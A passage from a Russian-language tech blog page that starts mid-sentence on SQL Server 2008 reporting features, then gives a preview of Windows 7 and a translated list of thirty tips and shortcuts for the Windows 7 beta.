помощи дизайнера отчетов (Report Designer). Рисунок 4. Конструктор отчетов Встроенная аутентификация форм Встроенная аутентификация форм позволяет пользователям легко переключаться между Forms и Windows. Внедрение приложений Report Server Средства внедрения приложений, входящие в Report Server, помещать в отчеты и подписки URL, указывающие обратный путь к интерфейсным приложениям. Интеграция с Office Благодаря взаимодействию SQL Server 2008 с Word пользователи могут читать отчеты непосредственно в Microsoft Office Word. Кроме того, значительно расширены возможности вывода отчетов в Excel. Теперь поддерживаются такие функции, как вложенные области данных, подотчеты, а также усовершенствована поддержка слияния ячеек. Это позволяет получить более качественное оформление и в целом повышает эффективность работы с отчетами в приложениях Microsoft Office.


Yuriy O.

Наш блог

Windows Se7en Vienna

Программы Windows 7 Изменений коснулась программная часть Windows 7 . Браузером, который будет поставляться с Windows 7 , станет Internet Explorer 8 , а проигрывателем мультимедиа файлов – Windows Media Player 12 . Однако интересна и другая новость. Как стало известно, в Windows 7 не будут установлены Windows Movie Maker , Windows Mail и Windows Photo Gallery . Впрочем, при необходимости их можно будет скачать через Windows Live Wave 3 . Похоже, что Microsoft всерьез опасается судебных разбирательств, связанных с её политикой предустановленных в операционную систему программных продуктов. Интерфейс Windows 7 Огромное число изменений и доработок пришлось на интерфейс Windows 7 , с которым приходится работать пользователю большую часть времени. Главные изменения, с которых мы начнем описание, касаются панели задач ( taskbar ). Как видно из скриншота, наша панель задач совершенно не содержит названий программ, а все запущенные приложения обозначаются одними пиктограммами. Однако текст можно включить из окна "Свойства панели задач" , но и в этом случае он будет отображаться только для активных программ, которые развернуты на рабочем столе. При клике на иконку, появляется список задач, который содержит список последних открытых программой файлов и некоторые базовые функции приложения. Эта функция носит название "Jump lists". Подверглось небольшому изменению и меню "Пуск". Теперь возле некоторых приложений отображается разворачивающийся список последних редактируемых файлов. Также, в этом меню можно обнаружить список чаще всего используемых папок, что будет довольно полезно при работе с большим количеством каталогов. Еще одна возможность Windows 7 , которая придется многим по вкусу: при наведении на иконку нужного окна в панели задач, все окна становятся практически прозрачными, за исключением выбранного. На рисунке продемонстрирован пример, когда в качестве активного окна был выбран рабочий стол. Похоже, что разработчики поняли всю неудобность использования боковой панели Windows, в которой находились мини-приложения, поэтому в Windows 7 от нее избавились. Теперь все гаджеты переместились на рабочий стол, а быстрый доступ к ним можно получить способом, описанным выше. Также был изменено оформление стандартных программ, редакторов текста WordPad и графики – Paint . Особо сильно "досталось" стандартному калькулятору. Теперь в нем доступно четыре режима работы: Standard , Scientific , Programmer и Statistics . Можно найти и дополнительные режимы: Date Calculation , Templates , Unit Conversion . Появилась долго ожидаемая история операций и возможность отмены последнего действия. Еще одним нововведением является появление специального интерфейса управления устройствами – Device Stage . Для примера рассмотрим процесс подключения сотового телефона. При подключении и определении устройства, в шапке окна Device Stage появляется логотип компании-производителя телефона, а также отображается информация о свободной памяти, состояние батареи и уровень сигнала. Также, при помощи Device Stage можно произвести синхронизацию телефона с компьютером. Ниже шапки находятся инструменты, которые позволят установить рингтон на телефон, скопировать мультимедиа файлы на телефон и другие функции. Для каждого подключаемого устройства будут использоваться собственные функции, которые будут загружаться из специального online-репозитория. В Windows 7 появилась возможность поиска по сетевым ресурсам, который называется консолидированным поиском (от англ. federated search ). На конференции Professional Developers Conference был продемонстрирован поиск на сервере Sharepoint . Из дополнительной информации известно, что функция консолидированного поиска реализована при помощи открытых стандартов OpenSearch и RSS2 , а это значит, что не составит проблем создавать подобные поиски на других серверах, таких как YouTube и любом другом. Новая функция – Libraries , призвана упростить организацию файлов, путем создания тематических библиотек. Но, пожалуй, самой любопытной особенностью Windows 7 обещает стать поддержка, так называемой технологии Multi-Touch , позволяющей управлять компьютером через сенсорный дисплей хоть всеми десятью пальцами обеих рук. Чтобы показать удобство всей этой затеи, Microsoft подготовила демонстрационный ролик. Как мы видим, помимо детских шалостей в графическом редакторе и с пианино, сенсорный интерфейс позволяет быстро и просто работать с картами и в крайне удобной форме просматривать фотографии. Если технология будет реализована без сучков и задоринок, Microsoft имеет все шансы влюбить потребителя в новую Windows, попутно в разы подняв продажи сенсорных дисплеев. Другие изменения Windows 7 В Windows 7 появилась специальная подсистема – Windows Sensors , которая обеспечивает поддержку сенсоров освещения, местоположения и других. Это означает, что новая система автоматически сможет регулировать, к примеру, уровень яркости, основываясь на данных сенсора. Многие ноутбуки уже начали оснащаться подобными сенсорами, взять, к примеру, новые ноутбуки Dell серии Latitude E, в которые встраиваются сенсоры окружающего света. Пока что все они требуют драйверы производителя, но введение Windows Sensors позволит OEM-производителям просто подключать датчики, забыв о драйверах. Также, по итогам конференции WinHEC, стало известно, что Windows 7 сможет опознавать SSD-диски и ОС будет оптимизирована под работу с ними. Когда ждать Windows 7? Пока точные сроки выхода Windows 7 не были обнародованы, а на прямые вопросы сотрудники Microsoft отвечают избитой фразой – "Не раньше, чем через 3 года после Windows Vista " . Стоит предположить, что выход операционной системы состоится к следующему рождественскому сезону. По некоторой информации , первая бета-версия Windows 7 должна увидеть свет в середине декабря, по другим данным ждать её не стоит раньше января 2009 года. К моменту старта продаж, Windows 7 будет доступна в двух модификациях: 32-битной и 64-битной. Другой информации, в каких версиях будет продаваться Windows 7 , пока нет. Заключение Как уже было сказано, Windows 7 – это улучшенная и дополненная Windows Vista, предположительно, с более гуманными системными требованиями. Гарантированна полная совместимость с драйверами и приложениями Vista, что сделает переход на Windows 7 для многих пользователей простым и безболезненным. Сделаем предварительные выводы: Windows 7 должна получить большую популярность, чем предыдущая Windows Vista, которую "ругают" и в сторону которой "плюются" до сих пор. Возможно дело с последней изменится с выходом SP2, а пока мы продолжим ждать более оптимизированную, удобную и стабильную Windows 7 . Самое главное, чтобы к моменту релиза разработчики ничего не испортили. Пока у них получается довольно неплохой результат, судя по прошедшим конференциям, у Windows 7 есть все шансы стать "народной" системой. Секреты Windows Vienna Признаюсь, что мне очень отрадно, что бета-версия Windows 7 доступна всем желающим и мы очень довольны тем прогрессом, которого мы добились за прошлые месяцы. Несмотря на то, что Windows 7 создана на базе Windows Vista, она обладает массой новых функций и обновленным интерфейсом. В своих будущих публикациях я постараюсь более подробно описать некоторые из этих функций, хотя, конечно, на этот счет написано много статей, в которых анализируется Windows 7. Среди особо интересных следует отметить публикации на Windows SuperSite и Arc Technica . Я также хотел бы обратить особое внимание на серию интервью , проведенных Йохай Кириати (Yochay Kiriaty) на Channel 9 , которые дадут вам представление о разработке новых функций Windows 7. Однако, сегодня я хотел бы сосредоточиться на некоторых секретах Windows 7: речь идет о нескольких настройках и расширениях. Эти настройки слишком малозначительны, чтобы попасть в официальный перечень функций новой ОС, хотя при возврате на предыдущие версии ОС их отсутствие вы заметите в первую очередь. Кто-то считает, что мы намеренно скрываем некоторые функции с целью упростить использование Windows для рядовых пользователей, но при работе над этим релизом мы приложили большие усилия, чтобы удовлетворить нужды опытных пользователей. Чтобы выразить свое уважение тем из нас, кто обладает пытливым умом и всегда старается отыскать в ОС что-то неизведанное, я написал эту статью, самую длинную из которых я когда-либо писал. Если вы уже загрузили и установили Windows 7 Beta, я не сомневаюсь, что вам будет интересно ознакомиться со списком тридцати моих самых любимых секретов новой ОС. Наслаждайтесь! 1. Берем окна под контроль Вы уже, вероятно, заметили, что Windows 7 делает управление окнами проще: вы можете прикрепить окно к левой или правой стороне экрана, просто перетащив его к нужному краю; точно также вы можете перетащить окно в верхней границе экрана, чтобы развернуть его или сделать двойной щелчок на верхней/нижней границе окна, чтобы растянуть его по вертикали на весь экран. Однако, возможно, вы не знали, что все эти действия могут быть проделаны с помощью сочетаний клавиатурных клавиш: Win + стрелка влево или Win + Стрелка вправо - прикрепить окно к краю Win + стрелка вверх или Win + Стрелка вниз - развернуть и восстановить/свернуть окно; Win + Shift + стрелка вверх или Win + Shift + стрелка вниз - развернуть и восстановить вертикальный размер окна. 2. Выводим изображение на проектор Вы уже потратили огромное количество своего времени на попытки настроить утилиты от OEM-поставщиков, пытаясь получить изображение с вашего ноутбука на внешний проектор? В таком случае вы будете рады тому, что увидите в Windows 7. Просто нажмите Win + P и перед вами предстанет следующее окно: Используйте стрелки на клавиатуре или продолжайте нажимать Win + P, чтобы переключаться между различными режимами отображения (клонировать изображение, расширить его на проектор или использовать для вывода картинки на внешний проектор). Приложение можно запустить через команду Run - требуется ввести displayswitch.exe. Если вам требуется еще больший контроль над настройками презентации, вы можете нажать Win + X для запуска Windows Mobility Center, который позволит вам включить режим презентации, в котором все IM-клиенты переключатся в режим ожидания и не будут мешать презентации, отключаются скринсейверы, устанавливаются нейтральные обои и т.д. Должен отметить, что с момента релиза Windows Vista это приложение не подвергалось никаким изменениям. 3. Избавляемся от помех Работаете с документом и хотите избавиться от постороннего шума? Просто нажмите Win + Home, чтобы свернуть все неактивные окна, при этом используемое вами в данный момент окно останется активным. Когда работа над документом будет закончена просто еще раз нажмите Win + Home, чтобы восстановить фоновые окна в их прежнее положение. 4. Управляем окнами в многомониторных конфигурациях В первом пункте этого списка я рассказал о том, каким образом можно прикреплять окна в пределах одного монитора. С помощью тех же комбинаций Win + Shift + стрелка влево/стрелка вправо вы можете перемещать окна с одного монитора на другой, при этом сохраняется исходное расположение окна относительно левого верхнего угла экрана монитора. 5. Фанатам командной строки посвящается Одной из наиболее популярных утилит из комплекта Power Toys для Windows XP была утилита "Open Command Prompt Here", которая позволяла использовать графическую оболочку для просмотра папок файловой системы и затем использовать контекстное меню для вызова командной строки из текущей рабочей папки. В Windows 7 (и в Windows Vista, хотя многие не знаю об этом), вы также можете, удерживая нажатой клавишу Shift при открытии контекстного меню, выбрать аналогичный пункт. Если текущая рабочая папка является сетевой, функция автоматически подключит сетевой диск. 6. Выбираем обои для своей страны Если вы уже пробовали сменить обои для рабочего стола, то, вероятно, обратили внимание на то, что в числе предлагаемых системой обоев есть набор, соответствующий стране, выбранной при установке Windows. Если выбрать, к примеру, США, то можно насладиться видами Кратерного озера в Орегоне, Национального парка Арчес и пляжа на Гавайских островах. В системе предусмотрено несколько тематических наборов обоев, установленных на основании выбранного вами языка, остальные наборы находятся в скрытой папке. Если вам интересно, то вы можете посмотреть на эти обои в папке C:WindowsGlobalizationMCT, где для каждой отдельной страны в папке Wallpapers находятся обои. Чтобы просмотреть все обои для выбранной страны просто дважды кликните на файле темы в папке Theme. Стоит отметить, что на данный момент некоторые страны имеют идентичный набор обоев, но к моменту релиза каждая страна обзаведется собственным. 7. Используем черный ящик Раньше каждому ИТ-специалисту приходилось мириться с тем, что у конечных пользователей не было возможности быстро и просто сделать запись последовательности своих действий, связанных с возникновением какой-то проблемы. И тут на выручку приходит Windows 7. Утилита Problem Steps Recorder, которая является одним из элементов набора диагностических инструментов, которые мы используем для обратной связи с разработчиками, представляет собой простой инструмент для захвата изображения с экрана монитора с возможностью аннотации изображений. После того, как вы нажмете "Record", приложение начинает отслеживать сигналы с вашей мыши и вашей клавиатуры и делать скриншоты, к которым вы можете прикреплять свои комментарии. Как только вы остановите запись, программа сохранит все полученные снимки в ZIP-файле, который содержит HTML-страницу с последовательностью ваших действий. Это действительно полезный инструмент, который пригодится на каждом компьютере. Приложение называется psr.exe, а найти его можно через поле для поиска в меню Start, введя "psr" без кавычек. 8. Работаем со шрифтами Лонг Ченг (Long Zheng) будет счастлив: мы наконец-то избавились от диалогового окна Add Fonts, которое служило Windows верой и правдой на протяжении последних двадцати лет. Стоит сказать, что в большинстве случаев это окно не использовалось - пользователям было проще просто перетащить нужный шрифт в папку Fonts. Но теперь установка шрифтов стала еще проще, поскольку в апплет просмотра шрифтов мы добавили кнопку "Install": В Windows 7 есть множество других новых функций работы со шрифтами, в том числе группировка нескольких стилей написания шрифтов, возможность скрыть шрифты, основываясь на региональных настройках, новый механизм визуализации шрифтов, встроенный в DirectWrite API, и поддержка отображения в диалоговом окне настройки шрифта более четырех стилей написания шрифтов: 9. Наслаждаемся новым шрифтом Помимо описанных в предыдущем пункте нововведений, Windows 7 включает в себя также новый шрифт Gabriola, разработанный Tiro Typeworks, который поддерживает OpenType Layout, что позволяет создавать множество стилистических вариаций написания этого шрифта: 10. Ускоряем загрузку браузера и страниц Если вам кажется, что Internet Explorer слишком долго загружается, то вам стоит посмотреть на список установленных надстроек (add-ons). Одним из наиболее полезных дополнений Internet Explorer 8 является инструмент управления надстройками, который позволяет вам определить, сколько времени тратится на загрузку надстроек. Просто откройте меню Tools ->Manage Add-ons и затем прокрутите список вправо, чтобы увидеть время загрузки надстроек. На моем компьютере я обнаружил, что подобной надстройкой, крадущей мое время, являлся Research Add-on, установленный Office 2007, а так как я его никогда не использую, то я просто отключил его в том же диалоговом окне. 11. Настраиваем порядок иконок Если вы ни разу не видели демонстрацию возможностей новой ОС, то вы, наверное, еще не знаете, что иконки на новой панели задач не имеют фиксированного месторасположения. Вы можете реорганизовать их под свои потребности, вне зависимости от того, идет ли речь о ярлыках или об отрытых приложениях. После того, как вы настроили расположение иконок по своему усмотрению, первые пять из них можно открывать путем нажатия клавишных комбинаций Win + 1, Win + 2, Win + 3 и т.д. А простым перетаскиванием можно настраивать порядок отображения иконок в системном трее или перемещать иконки в скрытую область и из нее. Это очень удобно, поскольку теперь можно настроить систему таким образом, чтобы она показывала только то, что действительно нужно. 12. Устанавливаем систему с USB-драйва У моей жены есть нетбук Samsung NC10 и мы хотели установить Windows 7 Beta на место предустановленной Windows XP. Как у большинства представителей класса нетбуков, на этом компьютере нет встроенного DVD-привода, да и у внешнего DVD-привода у меня нет. Проблема решается довольно-таки просто: я взял 4Гб флеш-драйв USB 2.0, отформатировал ее в FAT32 и просто скопировал все содержимое ISO-образа Windows 7 Beta на нее, воспользовавшись командой xcopy e: f: /e /f (где e: - буква DVD, f: - буква сменного носителя). Мало того, что с USB-носителя просто загрузиться и провести установку, сам процесс инсталляции прошел быстрее, чем когда я устанавливал Windows 7 с DVD-диска на моем настольном компьютере. Здесь следует отметить, что Windows 7 намного лучше подходит для нетбуков, чем любая другая операционная система: она требует меньше пространства на жестком диске и занимает меньше оперативной памяти, чем Windows Vista, имея при этом возможность оптимизации для работы на твердотельных накопителях (например, она отключает дефрагментацию диска, так как в этом случае случайный доступ и последовательный доступ для чтения имеют одинаковое быстродействие, а также по-другому обрабатывается удаление файлов, чтобы уменьшить износ твердотельного накопителя). 13. Реанимируем панель Quick Launch Вы, возможно, заметили, что старая добрая панель Qiuck Launch не только по умолчанию отключена в Windows 7, но и вообще отсутствует в списке панелей. Теперь набор ярлыков для быстрого запуска приложений, ранее выделенный на отдельную панель, встроен прямо в новую панель инструментов. Основываясь на результатах ранних тестов пользовательского интерфейса, мы думаем, что подавляющему большинству пользователей очень нравится новая панель, однако, если вы приверженец ретро, то вы будете рады узнать, что старые ярлыки там все еще есть. Чтобы вернуть их, нужно проделать следующее: Нажмите правой кнопкой мыши на панели задач и выберите Toolbar->New Toolbar; В диалоговом окне выбора папки введите следующую строчку и нажмите ОК: Код: %userprofile%AppDataRoamingMicrosoftInternet ExplorerQuick Launch Отключите функцию "Lock the Toolbar" и щелкните правой кнопкой мыши на разделителе. Убедитесь, что пункты "Show Text" и "Show Title" отключены и установите режим отображения "Small icons". Используйте разделитель, чтобы настроить взаимное расположение панелей и затем закрепите панель задач. Если вам кажется, что процедура слишком сложна, то хочется отметить, что мы в компании Microsoft не видим, что эта функция так уж необходима пользователям. Тем не менее, мы все равно оставили возможность включить ее, если вам по каким-то причинам крайне необходима панель быстрого запуска. Мы бы хотели, чтобы вы для начала попробовали в работе новую панель и сообщили нам о том, почему, по вашему мнению, она не соответствует вашим потребностям. 14. Быстрый доступ к функциям Большая работа была проделана над функцией Jump List, которая предоставляет пользователям быстрый доступ к функциям приложений. Всплывающие списки заменили в новой панели задач контекстное меню, вызываемое щелчком правой кнопки мыши; другим способом получить доступ к этому списку (особенно удобным для тех пользователей, кто работает на Windows 7 на однокнопочном MacBook) является вытягивание курсора мыши на значке приложения на панели задач с зажатой правой кнопкой мыши. Этот способ был разработан для таких устройств, таких как HP TouchSmart, предполагающих наличие сенсорного ввода. Метод вытягивание применим и в адресной строке IE8, где подобное действие открывает список, содержащий элементы списков History, Favorites и схожие с введенной строкой значения. 15. Поддержка стандартов В любом обзоре Windows 7 говорится об изменениях в интерфейсе программ WordPad и Paint, которые переняли от Office ленточный интерфейс. Немногие, однако, обратили внимание на одну маленькую, но важную деталь: теперь WordPad может читать и записывать не только файловый формат из Word 2007 - Office OpenXML, но и спецификацию OpenDocument, продвигаемую IBM и Sun: 16. Панель задач в стиле Windows Vista Поначалу я не был фанатом панели задач Windows 7, когда она появилась в ранних сборках Windows 7, но теперь я пересмотрел свое отношение к ней. Она оказалась гораздо удобнее старой, особенно в тех случаях, когда открыто много окон одновременно. Однако, для любителей ретро и здесь есть, чем поживиться: при желании новую панель задач можно настроить так, чтобы она выглядела как панель из Windows Vista: Чтобы добиться такого эффекта, щелкните правой кнопкой мыши на панели задач и выберите диалоговое окно свойств панели. Выберите переключатель "Small icons" и в настройках "Taskbar settings" выберите "Combine when taskbar is full". При этом панель задач визуально не будет полностью совпадать с таковой из Vista, но будет иметь очень схожую функциональность. 17. Беглый взгляд на рабочий стол Пока мы говорим о панели задач, следует отметить еще одну ее особенность. Вы, вероятно, заметили маленький прозрачный прямоугольник в правом нижнем углу панели: это кнопка, активизирующая функцию под названием "Aero Peek", которая позволяет увидеть вам любые гаджеты или иконки на вашем рабочем столе без необходимости сворачивать все открытые окна. Таким образом, вы можете быстренько окинуть взглядом рабочий стол и отыскать то, что вам нужно. Нажатию на кнопку соответствует клавиатурная комбинация Win + Space. 18. Запускаем приложения с правами администратора Хотите быстро запустить приложение, закрепленное на панели задач, с правами администратора? Для этого нажмите и удерживайте комбинацию Ctrl + Shift, когда будете нажимать на значок, и приложение сразу будет запущено с правами администратора (при наличии соответствующих прав). 19. Повторите, пожалуйста Если вы открыли какое-то приложение и хотите открыть еще один экземпляр того же приложения, нет необходимости открывать меню Start. Можно просто, удерживая кнопку Shift, щелкнуть по значку нужного приложения на панели задач и вместо того, чтобы перейти к этому приложению, система запустит еще один экземпляр приложения. Щелчок средней кнопкой мыши на значке приложения на панели задач выполняет аналогичное действие. Обратите внимание, функция работает только для тех приложений, которые допускают одновременный запуск нескольких копий. 20. Специальное переключение между окнами Еще одной функцией, которая должна понравиться опытным пользователям, является своего рода аналог переключения "Alt + Tab", который переключает окна, принадлежащие одному приложению. Например, если у вас открыто пять окон с сообщениями Outlook вместе с десятью другими окнами, чтобы переключать только между окнами Outlook, вы можете щелкать по значку приложения на панели задач, удерживая нажатой клавишу Ctrl. Этот способ позволит гораздо быстрее переключаться между пятью открытыми окнами приложения, нежели пытаться разобраться, к какому именно сообщению относятся маленькие эскизы при переключении через Alt + Tab. 21. Гуляем по панели задач Еще одна "секретная" комбинация клавиш Windows: нажмите Win + T, чтобы перемещать фокус выделения по элементам на панели задач. Чтобы запустить выбранное таким образом приложение (перемещать выделение можно стрелками), просто нажмите кнопку Enter, а для того, чтобы выйти их этого режима, нажмите Esc. Я не уверен, но предполагаю, что эта клавиатурная комбинация введена для людей с ограниченными физическими возможностями. Однако, эта функция может оказаться весьма полезной и для обычных пользователей. 22. Совет владельцам широкоформатных экранов Практически каждый из продаваемых сегодня мониторов оснащен широкоформатным экраном, при этом неважно, идет ли речь о ноутбуке или мониторе для настольного компьютера. Несмотря на то, что они очень удобны для просмотра фильмов, при работе на таком мониторе может показаться, что рабочее пространство слегка сжато по вертикали. Поэтому первое, что я делаю, когда настраиваю любой новый компьютер, это прикрепляют панель задач к правой стороне экрана. Я понимаю, почему мы не делаем этого по умолчанию - подобное решение могло бы повлечь за собой жалобы от работников IT-отделов предприятий, которым пришлось бы переобучать весь их штат, однако, я не вижу причин, по которым опытные пользователи должны страдать от этих настроек по умолчанию, оставшихся с тех времен, когда стандартным было разрешение 800x600. В прошлом Windows мало заботилась о нуждах любителей подобного расположения панели задач, к коим я отношу и себя. Конечно, вы могли переместить панель задач, но складывалось впечатление, что эта возможность разрабатывалась в последнюю очередь. Что же касается Windows 7, то здесь кажется, что панель задач специально разрабатывалась для использования в вертикальном режиме по умолчанию - иконки прекрасно работают на левой/правой стороне экрана, клавиатурные комбинации автоматически адаптируется под вертикальное положение, используя для перемещения выделения вместе стрелок влево/вправо стрелки вверх/вниз, и т.п. В итоге мы получаем рабочую область с намного лучшими пропорциями. Если вы являетесь владельцем, скажем, нетбука с разрешением экрана 1280x600, то вы сразу же оцените наличие нового пространства для просмотра веб-страниц. Поначалу будет немного непривычно, но я вам гарантирую, что в итоге вы перейдете в лагерь любителей вертикального расположения панели задач! 23. Закрепляем любимые папки в панели задач Если в своей работе вы привыкли пользоваться определенным набором папок, вы с легкостью можете закрепить их в меню кнопки Explorer на панели задач. Зажмите правую кнопку мыши и перетащите нужную папку на панель задач, и она автоматически закрепиться в меню Explorer. 24. Запускаем Windows Explorer с папки Computer Некоторым пользователям не нравится, что нажатие на кнопку Windows Explorer приводит их в паку Libraries, поскольку они предпочитают, чтобы открывалась папка Computer: Для того, чтобы при щелчке на Windows Explorer открывалась папка Computer, просто измените в свойствах ярлыка Windows Explorer поле Target на Код: %SystemRoot%explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} Чтобы это изменение затронуло и ссылку в меню Start, то вам потребуется изменить поле Target в свойствах ярлыка Windows Explorer и в папке Accessories из меню Start, при этом нажатие Win + E по-прежнему будет открывать папку Libraries. К сожалению, я пока не нашел способ изменить такое поведение. 25. Настраиваем ClearType и цветопередачу монитора Если вы хотите настроить отображение изображений и текста вашим монитором, вы можете воспользоваться встроенными в Windows 7 инструментами. Просто удивительно, к каким изменениям это приводит: немного затемнив цвет текста и откорректировав гамму, я сделал изображение на моем ноутбуке намного более четким, чем оно было прежде. Вы же корректируете яркость и контрастность на вашем только что купленном телевизоре, так почему бы не сделать то же самое для вашего компьютерного монитора, которым вы пользуетесь каждый день? Попробуйте приложения cttune.exe или dccw.exe, или воспользуйтесь соответствующими пунктами в панели управления. 26. Записываем ISO-образы Эту функцию легко и не увидеть, если не искать ее специально: вы можете дважды кликнуть на любом ISO-образе и вы увидите полезную маленькую утилиту, которая позволит вам записать этот образ на чистый диск. Скажем НЕТ засилью платных утилит сомнительного происхождения! 27. Работаем с Windows Movie Maker Из состава Windows 7 исключен инструмент для редактирования видео - он перемещен в пакет программ Windows Live Essentials, наряду с такими приложениями как Photo Gallery, Mail и Messenger. К сожалению, Windows Movie Maker до сих пор находится в стадии бета-тестирования, из-за чего в нем отсутствует большая часть старых функций. Конечно же, мы надеемся к выпуску Windows 7 завершить работу над этим приложением, но пока что лучшим решением для нас - исследователей - является использование Windows Movie Maker 2.6. Да, он не содержит в себе всего комплекта эффектов и переходов из версии, предназначенной для Windows Vista, и в нем невозможно редактировать HD-видео, но он по-прежнему подходит для выполнения большинства задач, связанных с редактированием домашнего видео. Загрузить Windows Movie Maker 2.6 можно отсюда . 28. Прячем иконку Windows Live Messenger Надеюсь, что вашим первым действием после окончания установки Windows 7 была загрузка и установка набора приложений Windows Live Essentials (если нет, то вы теряете часть возможностей новой версии Windows). Если вы - верный пользователь IM-клиентов, вы наверняка оцените способ доступа к функциям Windows Live Messenger посредством панели задач, где вы можете изменить свой статус или отправить быстрое сообщение любому контакту: С другой стороны, вам, возможно, хотелось бы вернуть иконку Windows Live Messenger в системный трей, где она располагалась в предыдущих релизах. Если это так, то вы можете вернуть Windows Live Messenger прежний стиль поведения. Чтобы это сделать, закройте Windows Live Messenger, откройте свойства ярлыка приложения и установить опцию запуска приложения в режиме совместимости с Windows Vista. 29. Наслаждаемся видом рыбки Я был удивлен тем, что многие не поняли тонкую шутку про сиамскую бойцовую рыбку, изображенную на установленной по умолчанию заставке рабочего стола. Так вот рыбка это называется betta. Улавливаете наш тонкий замысел? 30. Когда ничего не помогает... Всегда случаются такие моменты, когда ваша система категорически отказывается нормально работать. И в эти моменты вам очень хочется быстро получить доступ к командной строке, чтобы исправить проблему. В Windows 7 стало возможным создавать системный загрузочный диск, представляющий собой загрузочную CD-версию Windows, которая включает в себя только командную строку и набор диагностических утилит. Просто введите "system repair disc" в строке поиска меню Start и запустите утилиту.     Microsoft Video  


Yuriy O.